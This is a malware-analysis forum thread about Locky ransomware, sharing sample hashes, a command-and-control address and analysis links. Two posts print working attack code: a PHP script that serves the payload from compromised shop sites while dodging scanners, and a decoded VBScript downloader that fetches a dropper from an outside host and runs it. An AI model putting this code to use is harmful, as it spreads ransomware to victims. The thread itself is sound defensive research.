Locky ransomware

Forum for analysis and discussion about malware.
patriq
Posts: 108
Joined: Fri Jun 28, 2013 8:11 pm
Contact:

Re: Locky ransomware

Post by patriq » Fri Apr 01, 2016 12:40 am

Sample from Distribution Site
https://ransomwaretracker.abuse.ch/host ... lebox.com/

https://www.virustotal.com/en/file/003d ... /analysis/

I'm seeing it POST to 185.75.46.4/submit.php now
https://ransomwaretracker.abuse.ch/ip/1 ... 5.75.46.4/
(listed as offline now?)

Ransom note
_HELP_instructions.gif
Payment:
paymentscreenshot.png
You do not have the required permissions to view the files attached to this post.

User avatar
rkhunter
Posts: 1156
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Contact:

Re: Locky ransomware

Post by rkhunter » Mon Apr 11, 2016 10:51 am

Locky ransomware, TeslaCrypt & other malware families use new tool to evade detection

http://researchcenter.paloaltonetworks. ... detection/

Locky sample in attach.
SHA-256: 4b9a525a80cdba0d827b52d1e19c0b74e055b9afacfa2910dd32230826f91a7a
You do not have the required permissions to view the files attached to this post.

benkow_
Posts: 85
Joined: Sat Jan 24, 2015 12:14 pm

Re: Locky ransomware

Post by benkow_ » Wed Apr 13, 2016 1:27 pm

Example of script used to spread Locky (hosted on compromised OpenCart with url pattern: XXX.com/image/flags/.../40X.php?f=XXX)

Code: Select all

<?php
error_reporting(0);
$file = isset($_GET['f']) ? $_GET['f'] : "";
 
if (file_exists($file)) {
    $ip = $_SERVER['REMOTE_ADDR'];
    $ua = $_SERVER['HTTP_USER_AGENT'];
    $geoPlugin_array = unserialize( file_get_contents('http://www.geoplugin.net/php.gp?ip=' . $ip) );
    $c_name = $geoPlugin_array['geoplugin_countryName'];
    $c_code = $geoPlugin_array['geoplugin_countryCode'];
 
    if (0 === strpos($c_code, "CN")) exit;
    if (0 === strlen($ua)) exit;
    if (strpos(file_get_contents($file.".stats_ip.txt"), "IP:".$ip) !== false) exit;
    if (0 === strpos($ip, "173.245.81.")) exit;
    if (false !== strpos($ua, "virustotal")) exit;
 
    file_put_contents($file.".stats.txt", "DATE:".date("Y-m-d H:i:s")."\tIP:".$ip."\tCOUNTRY:(".$c_code.")".$c_name."\tUA:".$ua."\tREF:".$_SERVER['HTTP_REFERER']."\n", FILE_APPEND);
    file_put_contents($file.".stats_ip.txt", "IP:".$ip."\n", FILE_APPEND);
 
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
}
exit;
?>

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Locky ransomware

Post by Antelox » Fri Apr 29, 2016 1:10 pm

Found inside Locky JS Downloader! =)
inside_locky_js_downloader.jpg
BR,

Antelox
You do not have the required permissions to view the files attached to this post.

User avatar
frank_boldewin
Posts: 116
Joined: Thu Apr 22, 2010 8:59 am
Location: germany
Contact:

Re: Locky ransomware

Post by frank_boldewin » Wed May 11, 2016 7:39 pm

Just analysed a new way Locky tries to install on systems. Very small zip-files (<1000 Bytes), after unzipping there's a rar-file and inside this one a .vbe (encrypted .vbs file).
The vbs file tries to download and run a locky dropper.

Several AV-Scanners suck to detect this.

Encrypted .vbe file

Code: Select all

'**LE9Cu2HlEvfKIPN**#@~^TwAAAA==@#@&L4Tq~|SkN,xPrtOYa)&&mxYb5E/O(r8VR1WhzA2 kUm^;N/&^DYrWbmCYdJ.{GLREJ@#@&URkAAA==^#~@ 
'**LE9Cu2HlEvfKIPN**#@~^bQIAAA==@#@&tn_KGs9_.mdP{PEyX6^a.my$dNm/RarWJ,@#@&joL4-kl4N6VfG\~x,ZDnCD+64Nn1YcrUmDbwD ?4+sVr# 3Xwl	[2	\kMGU:xD?ODrUT/cJuO+swYE*@#@&ioNt-/m490VGf7P',jw%t7/Ct90V9G\PL~J'J@#@&[r:,x	|$1F^m/lPUnY,xUF~1|^CkPxP1.lOW(L+1YvEHbm.WkWWOc(HduK:nJ*@#@&Nb:,m^Mo9_?9m1d),?nO,mm!oGCjf1^kPx,mM+lD+K8LmO`rb[G94RUODl:rb@#@&	xnAH|^CkR6wUPrM3Pr~P%4Tq$|dd9~~wl^/+@#@&	U|~1Fmm/ jxN@#@&hbYt,^^Mwf_?9m^d@#@&~P,~RDX2n,'Pq~@#@&~P,~cW2x@#@&P,P, hMkO+,xUF~1|1C/cD+k2Gxk+~W[X@#@&,P~Pcdl7+OG6kVn~`s%t7dmt[63Gf\,[,~tCPfw9u#m/~,+P@#@&+	[~hbY4@#@&?nO,t[KIojkl[[1P'~/M+CY6(Ln1YvJ?4+^sRzw2VbmCObWxrbP@#@&t9Pes`/mN[m 6a+UP`oL4\dC4N0V9G\~[,4CPGsxC.m/@#@&E7sAAA==^#~@ 
Decrypted:

Code: Select all

jhgIBKLsd = "http://antiques-bible.com/wp-includes/certificates/V7Dj8u"

heHTDFJHVas = "zxxcxzczqsdas.pif"
UFjhvsahdfkDDv = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")
UFjhvsahdfkDDv = UFjhvsahdfkDDv & "\"
dim nnKBNKcas: Set nnKBNKcas = createobject("Microsoft.XMLHTTP")
dim ccGFDHSDccs: Set ccGFDHSDccs = createobject("Adodb.Stream")
nnKBNKcas.Open "GET", jhgIBKLsd, False
nnKBNKcas.Send
with ccGFDHSDccs
    .type = 1
    .open
    .write nnKBNKcas.responseBody
    .savetofile UFjhvsahdfkDDv &  heHTDFJHVas, 2
end with
Set hdTYFUsaddc = CreateObject("Shell.Application")
hdTYFUsaddc.Open UFjhvsahdfkDDv & heHTDFJHVas
Dropper attached!
You do not have the required permissions to view the files attached to this post.

patriq
Posts: 108
Joined: Fri Jun 28, 2013 8:11 pm
Contact:

Re: Locky ransomware

Post by patriq » Tue May 17, 2016 11:34 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 326
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Tue May 24, 2016 5:51 pm

You do not have the required permissions to view the files attached to this post.

sysopfb
Posts: 97
Joined: Thu Oct 23, 2014 1:22 am
Contact:

Re: Malware collection

Post by sysopfb » Tue May 24, 2016 11:26 pm


User avatar
xors
Posts: 163
Joined: Mon May 23, 2016 2:01 am

Re: Locky ransomware

Post by xors » Wed Jun 01, 2016 8:10 pm

From 193.9.28.13


https://malwr.com/analysis/YWRiYjMwYTc0 ... JhNzg5NDc/ (packed)

https://malwr.com/analysis/OTM1NWYzODU1 ... liNmRiZjc/ (unpacked)

There is a PDB path in the packed file :

C:\B4\Actually\snappy\soldiers\spe.pdb
You do not have the required permissions to view the files attached to this post.

User avatar
xors
Posts: 163
Joined: Mon May 23, 2016 2:01 am

Re: Locky ransomware

Post by xors » Wed Jun 01, 2016 9:08 pm

You do not have the required permissions to view the files attached to this post.

Post Reply